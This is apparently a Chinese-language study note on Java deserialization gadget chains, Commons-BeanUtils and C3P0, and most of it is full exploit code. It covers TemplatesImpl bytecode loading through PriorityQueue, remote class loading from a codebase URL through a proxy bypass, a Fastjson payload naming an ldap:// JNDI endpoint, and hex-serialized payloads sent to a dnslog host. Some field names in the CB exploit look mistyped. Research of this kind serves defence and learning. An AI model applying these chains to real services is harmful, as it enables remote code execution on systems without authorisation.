CB C3P0 链

CB 链#

commans BeanUtils 提供了一个通过反射获取 Java Bean 属性的方法 PropertyUtils.getProperty() ，在获取 Bean 的某个特定属性值时，调用该属性的 getter 方法，因此衔接了 TemplateImpl 的 getOutproperties 加载恶意字节码，或是 JdbcRowSetImpl 的 getDatabaseMetaData 方法打 JNDI 注入。

接下来查找哪里调用了 PropertyUtils.getProperty() ，

创建 BeanComparator 实例的时候传入 property ,接下来查找怎么调用其 compare ,

反序列化时会调用 compare 还原原始对象位置的, 在 TreeMap 的 readObject 方法中跟进查找并没有 compare , TreeSet 也一样，优先队列 PriorityQueue 中存在 compare 调用

exp 如下

1
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
2
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
3
import org.apache.commons.beanutils.BeanComparator;
4
import org.apache.commons.beanutils.PropertyUtils;
5

6
import java.io.*;
7
import java.lang.reflect.Field;
8
import java.lang.reflect.InvocationTargetException;
9
import java.nio.file.Files;
10
import java.nio.file.Paths;
11
import java.util.PriorityQueue;
12
import java.util.TreeMap;
13
import java.util.TreeSet;
14
import java.util.concurrent.ConcurrentSkipListMap;
15

16
public class CB {
17
    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, InvocationTargetException, NoSuchMethodException, ClassNotFoundException {
18
        byte[] code = Files.readAllBytes(Paths.get("D:\\tools_D\\java\\java_learn\\cc_chain\\cc3_\\src\\main\\java\\templatesBytes.class"));
19
        byte[][] evil = new byte[1][];
20
        evil[0] = code;
21

22
        TemplatesImpl templatesImpl = new TemplatesImpl();
23
        setFieldValue(templatesImpl,"_name","evil");
24
        setFieldValue(templatesImpl,"_tfactory",new TransformerFactoryImpl());
25
        setFieldValue(templatesImpl,"_bytecodes",evil);
26

27
//        PropertyUtils.getProperty(templatesImpl,"outputProperties");
28
//        BeanComparator beanComparator= new BeanComparator("outputProperties");
29
//        beanComparator.compare(templatesImpl,templatesImpl);
30
        BeanComparator beanComparator = new BeanComparator();
31
        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
32
        queue.add(1);
33
        queue.add(2);
34

35
        setFieldValue(queue,"quene",new Object[]{templatesImpl,templatesImpl});
36
        setFieldValue(beanComparator,"property","outProperties");
37
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
38
        ObjectOutputStream oos = new ObjectOutputStream(bos);
39
        oos.writeObject(queue);
40
        oos.close();
41

42
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()));
43
        ois.readObject();
44
    }
45
    public static void setFieldValue(Object o,String field,Object value) throws NoSuchFieldException, IllegalAccessException {
46
        Class<?> clazz = o.getClass();
47
        Field fieldName = clazz.getDeclaredField(field);
48
        fieldName.setAccessible(true);
49
        fieldName.set(o,value);
50
    }
51
}

C3P0 链#

1. URLClassLoader 远程类加载#

exp 如下

1
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
2

3
import javax.naming.Reference;
4
import java.io.*;
5
import java.lang.reflect.Constructor;
6
import java.lang.reflect.Field;
7
import java.lang.reflect.InvocationTargetException;
8

9
public class C3P0 {
10
    public static void main(String[] args) throws ClassNotFoundException, InvocationTargetException, InstantiationException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException, IOException {
11
        String className = "Exploit";
12
        String factory = "Exploit";
13
        String codebase = "http://localhost:8080/";
14
        Reference ref = new Reference(className,factory,codebase);
15

16
        Class<?> refSerClass = Class.forName("com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized");
17
        java.lang.reflect.Constructor<?> constructor = refSerClass.getDeclaredConstructor(
18
                javax.naming.Reference.class,
19
                javax.naming.Name.class,
20
                javax.naming.Name.class,
21
                java.util.Hashtable.class
22
        );
23
        constructor.setAccessible(true);
24
        Object referenceSerialized = constructor.newInstance(ref, null, null, null);
25

26
        PoolBackedDataSourceBase pbd = new PoolBackedDataSourceBase(false);
27
        setFieldValue(pbd,"connectionPoolDataSource",referenceSerialized);
28
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
29
        ObjectOutputStream oos = new ObjectOutputStream(baos);
30
        oos.writeObject(pbd);
31
        oos.close();
32

33
        byte[] payload = baos.toByteArray();
34
        ByteArrayInputStream bais = new ByteArrayInputStream(payload);
35
        ObjectInputStream ois = new ObjectInputStream(bais);
36
        ois.readObject();
37
    }
38

39
    public static void setFieldValue(Object obj,String Field,Object value) throws NoSuchFieldException, IllegalAccessException {
40
        Class<?> clazz = obj.getClass();
41
        Field field = clazz.getDeclaredField(Field);
42
        field.setAccessible(true);
43
        field.set(obj,value);
44
    }
45
}

报错如下

1
Exception in thread "main" java.lang.IllegalArgumentException: Can not set javax.sql.ConnectionPoolDataSource field com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase.connectionPoolDataSource to com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized
2
  at sun.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)
3
  at sun.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)
4
  at sun.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81)
5
  at java.lang.reflect.Field.set(Field.java:764)
6
  at C3P0.setFieldValue(C3P0.java:44)
7
  at C3P0.main(C3P0.java:28)

com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized 不是javax.sql.ConnectionPoolDataSource 类型，这里可以使用动态代理进行绕过，这样本地反射设值的时候满足类型检查，当反序列化调用到 getObject 方法时，将其代理到前面设置好的 referenceSerialized 。

1
javax.sql.ConnectionPoolDataSource proxyDataSource = (javax.sql.ConnectionPoolDataSource) Proxy.newProxyInstance(
2
        C3P0.class.getClassLoader(),
3
        new Class<?>[]{
4
                javax.sql.ConnectionPoolDataSource.class,
5
                javax.naming.Referenceable.class,
6
                IndirectlySerialized.class
7
        },
8
        new InvocationHandler() {
9
            @Override
10
            public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
11
                return method.invoke(referenceSerialized, args);
12
            }
13
        }
14
);

再次报错

1
Exception in thread "main" java.io.IOException: Problem indirectly serializing connectionPoolDataSource: java.lang.ClassCastException: com.sun.proxy.$Proxy0 cannot be cast to javax.naming.Referenceable
2
    at com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase.writeObject(PoolBackedDataSourceBase.java:175)
3
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
4
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
5
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
6
    at java.lang.reflect.Method.invoke(Method.java:497)
7
    at java.io.ObjectStreamClass.invokeWriteObject(ObjectStreamClass.java:1028)
8
    at java.io.ObjectOutputStream.writeSerialData(ObjectOutputStream.java:1496)
9
    at java.io.ObjectOutputStream.writeOrdinaryObject(ObjectOutputStream.java:1432)
10
    at java.io.ObjectOutputStream.writeObject0(ObjectOutputStream.java:1178)
11
    at java.io.ObjectOutputStream.writeObject(ObjectOutputStream.java:348)
12
    at C3P0.main(C3P0.java:42)

下断点找到抛出错误的代码行，

跟进发现 orig 需要实现 Referenceable 接口，并且实现 getReference() 方法，

1
public IndirectlySerialized indirectForm( Object orig ) throws Exception
2
{
3
    Reference ref = ((Referenceable) orig).getReference();
4
    return new ReferenceSerialized( ref, name, contextName, environmentProperties );
5
}

该 ref 即是 urlClassLoader 加载的类引用

1
ReferenceableUtils.referenceToObject( reference, name, nameContext, env );

修一下 proxy ，exp 如下

1
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
2
import com.mchange.v2.ser.IndirectlySerialized;
3

4

5
import javax.naming.Reference;
6
import java.io.*;
7
import java.lang.reflect.*;
8

9
public class C3P0 {
10
    public static void main(String[] args) throws ClassNotFoundException, InvocationTargetException, InstantiationException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException, IOException {
11
        String className = "Exploit";
12
        String factory = "Exploit";
13
        String codebase = "http://localhost:8080/";
14
        Reference ref = new Reference(className,factory,codebase);
15

16
        Class<?> refSerClass = Class.forName("com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized");
17
        java.lang.reflect.Constructor<?> constructor = refSerClass.getDeclaredConstructor(
18
                javax.naming.Reference.class,
19
                javax.naming.Name.class,
20
                javax.naming.Name.class,
21
                java.util.Hashtable.class
22
        );
23
        constructor.setAccessible(true);
24
        Object referenceSerialized = constructor.newInstance(ref, null, null, null);
25

26
        javax.sql.ConnectionPoolDataSource proxyDataSource = (javax.sql.ConnectionPoolDataSource) Proxy.newProxyInstance(
27
                C3P0.class.getClassLoader(),
28
                new Class<?>[]{
29
                        javax.sql.ConnectionPoolDataSource.class,
30
                        javax.naming.Referenceable.class,
31
                        IndirectlySerialized.class
32
                },
33
                new InvocationHandler() {
34
                    @Override
35
                    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
36
                        String methodName = method.getName();
37
                        if ("getReference".equals(methodName)) {
38
                            return ref;
39
                        }
40
                        return method.invoke(referenceSerialized, args);
41
                    }
42
                }
43
        );
44

45
        PoolBackedDataSourceBase pbd = new PoolBackedDataSourceBase(false);
46
        setFieldValue(pbd,"connectionPoolDataSource",proxyDataSource);
47
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
48
        ObjectOutputStream oos = new ObjectOutputStream(baos);
49
        oos.writeObject(pbd);
50
        oos.close();
51

52
        byte[] payload = baos.toByteArray();
53
        ByteArrayInputStream bais = new ByteArrayInputStream(payload);
54
        ObjectInputStream ois = new ObjectInputStream(bais);
55
        ois.readObject();
56
    }
57

58
    public static void setFieldValue(Object obj,String Field,Object value) throws NoSuchFieldException, IllegalAccessException {
59
        Class<?> clazz = obj.getClass();
60
        Field field = clazz.getDeclaredField(Field);
61
        field.setAccessible(true);
62
        field.set(obj,value);
63
    }
64
}

成功触发 calc

2. JNDI 注入#

全局搜索 lookup 方法，

exp 如下

1
import com.alibaba.fastjson.JSON;
2

3
public class Fastjson {
4
    public static void main(String[] args) {
5
        String payload = "{\"@type\":\"com.mchange.v2.c3p0.JndiRefForwardingDataSource\",\"jndiName\":\"ldap://127.0.0.1:2333/evilexp\", \"loginTimeout\":0}";
6
        JSON.parseObject(payload);
7
    }
8
}

3. hex 字节码加载#

调用栈如下,fastjson 触发 setter 方法 —> gadget

反序列化的时候实例化该类，会调用 parseUserOverridesAsString 方法，并且每次 UserOverridesAsString 值更改时会被监听器检测到，再次调用该方法。

exp 如下

1
import com.alibaba.fastjson.JSON;
2
import java.io.ByteArrayOutputStream;
3
import java.io.ObjectOutputStream;
4
import java.lang.reflect.Field;
5
import java.net.URL;
6
import java.util.HashMap;
7

8
public class C3P0FastjsonExp {
9

10
    public static String bytesToHexString(byte[] src) {
11
        if (src == null || src.length <= 0) {
12
            return null;
13
        }
14
        StringBuilder stringBuilder = new StringBuilder("");
15
        for (byte b : src) {
16
            int v = b & 0xFF;
17
            String hv = Integer.toHexString(v);
18
            if (hv.length() < 2) {
19
                stringBuilder.append(0);
20
            }
21
            stringBuilder.append(hv);
22
        }
23
        return stringBuilder.toString().toUpperCase();
24
    }
25

26

27
    public static String generateURLDNSPayload(String urlString) throws Exception {
28
        HashMap<URL, String> hashMap = new HashMap<>();
29
        URL url = new URL(urlString);
30

31
        Field hashCodeField = Class.forName("java.net.URL").getDeclaredField("hashCode");
32
        hashCodeField.setAccessible(true);
33
        hashCodeField.set(url, 12345);
34

35
        hashMap.put(url, "111");
36
        hashCodeField.set(url, -1);
37

38
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
39
        ObjectOutputStream oos = new ObjectOutputStream(baos);
40
        oos.writeObject(hashMap);
41
        oos.close();
42

43
        return bytesToHexString(baos.toByteArray());
44
    }
45

46
    public static void main(String[] args) {
47
        try {
48
            String targetDnsLog = "http://29vul8.dnslog.cn";
49
            String hexPayload = generateURLDNSPayload(targetDnsLog);
50
            String fastjsonExp = "{\"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\"userOverridesAsString\":\"HexAsciiSerializedMap:HexContents;\"}";
51
            fastjsonExp = fastjsonExp.replace("HexContents", hexPayload);
52
//            System.out.println("[*] Payload:\n" + fastjsonExp);
53
            JSON.parseObject(fastjsonExp);
54

55
        } catch (Exception e) {
56
            e.printStackTrace();
57
        }
58
    }
59
}